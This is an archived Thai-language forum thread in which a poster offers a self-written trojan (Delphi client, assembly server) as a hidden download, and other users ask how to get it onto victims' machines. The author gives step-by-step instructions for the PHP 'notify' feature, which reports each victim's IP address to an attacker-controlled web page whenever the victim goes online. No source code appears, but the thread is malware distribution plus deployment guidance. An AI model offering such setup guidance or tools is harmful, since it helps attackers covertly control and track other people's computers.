PDA

View Full Version : มาทดลองโทรจันลูกผสม (โทรจันเขียนเอง)



neoclassic
09-01-2007, 07:20 PM
เป็นโทรจันลูก ผสม ที่ทดลองเขียน เล่นๆ
Client เขียนด้วย Delphi
Server เขียนด้วย asm

Notify ผ่าน php script
เขียนแบบง่ายๆ ไม่มีอะไร พิเศษมากนัก
ใช้เพื่อทดลองเท่านั้น! :P

[attachmentid=183]



แก้ Link ใหม่






**Hidden Content: Check the thread to see hidden data.**

hackgood
08-03-2007, 02:33 PM
ง่า ผมลอง แล้ว ติดโทรจัน AdobeR.exe เลยอ่าคับ ทำไงดี แย่แล้ว
แต่ก่อนไม่มีนะคับ พึ่งมีตอนลง ไงดี แงๆๆๆๆ แบบนี้คงไม่ได้เลนคอมอีกหลายวัน :(

arigaz
21-03-2007, 10:03 PM
โทดทีนะคะ คือมันโหลดไม่ได้อ่ะค่ะ ช่วยอัพให้ใหม่ทีได้ไหมคะ แล้วก็ช่วยบอกวิธีการทำงานของมันด้วยได้ไหมคะ ว่าเป็นยังไงขอบคุนค่า

neoclassic
22-03-2007, 08:06 PM
ผมแก้ลิ๊งค์ ดาวน์โหลดใหม่แล้ว นะครับ พร้อม รูป แสดงวิธีใช้แบบ คร่าวๆ :P



ง่า ผมลอง แล้ว ติดโทรจัน AdobeR.exe เลยอ่าคับ ทำไงดี แย่แล้ว[/b]

โทรจันที่ผมเขียนทุกตัว รับรอง clean แบบสุดๆ ไม่มี back door ใน back door หรือ back door ใน โทรจัน

หากไปโหลด จาก ผู้อื่น ผมไม่รับรอง ความ clean ของไฟล์........

mylovemycom2
27-03-2007, 05:47 PM
ขอบคุณคับ แต่ว่าจาทำอย่างไงให้นำไฟ server ไปรันบนเครื่องเป้าหมายได้ละครับ
และถ้า จะส่งไปผ่าน dos จะพิมพ์คำสั่งว่าอะไรคับ

ขอบคุณมากครับ

mushachi71
02-04-2007, 03:19 PM
ขอบคุณมากคับ ผมกำลังศึกษาอยู่คับถึงหลักการทำงาน(มือใหม่คับ) แต่ผมขอถามหน่อยคับnotify ที่คุณทำมันจะส่งกลับมาได้ไงอ่ะคับ ผมต้องใส่อะไรลงไปหรอคับผมจะลองเล่นในวงlanดู ไม่รู้ว่าจะได้ไหมคับ เคยลองดูsub7 แต่มันไม่ support XP ก็เลยไม่ได้เล่นอีกเลยคับ ก็ว่าจะลองของคุณ คือต้องส่ง sever ไปที่เครื่องเหยื่อ แต่ผมไม่เข้าใจหลักการ notify อ่ะคับ ช่วยอธิบายให้หน่อยได้ไหมคับ :)

neoclassic
02-04-2007, 07:31 PM
notify แบบ php คือ

1. หาเว็บเป็นของตัวเอง เช่น http://www.lamer.com (ฟรี ก็ได้ เพียบเลย) ที่รองรับ php
2. Builder จะมี ให้ create php files มันจะออกมาเป็น index.php อยู่ใน folder ให้ upload ขึ้นไปบนเว็บ
3. ป้อน url ลงใน Builder ตรง php notify เช่น http://www.lamer.com/index.php
4. ทุกครั้งที่ เหยื่อต่อ net มันจะส่ง ไอพี พร้อมรายละเอียด มายังเว็บ http://www.lamer.com/index.php
5. เปิด เว็บ http://www.lamer.com/index.php ใส่พาสเวิร์ด 2 รอบ


***code php notify ASM http://www.citecclub.org/forum/-Php-Php-No...Masm-t3656.html (http://www.citecclub.org/forum/-Php-Php-Notify-Masm-t3656.html)
ในโทรจันใช้คล้ายแบบเนี่ย แต่ จะเร็วกว่าและ เสถียรภาพดีกว่า code ต.ย นิดหน่อย แต่คล้ายๆ กัน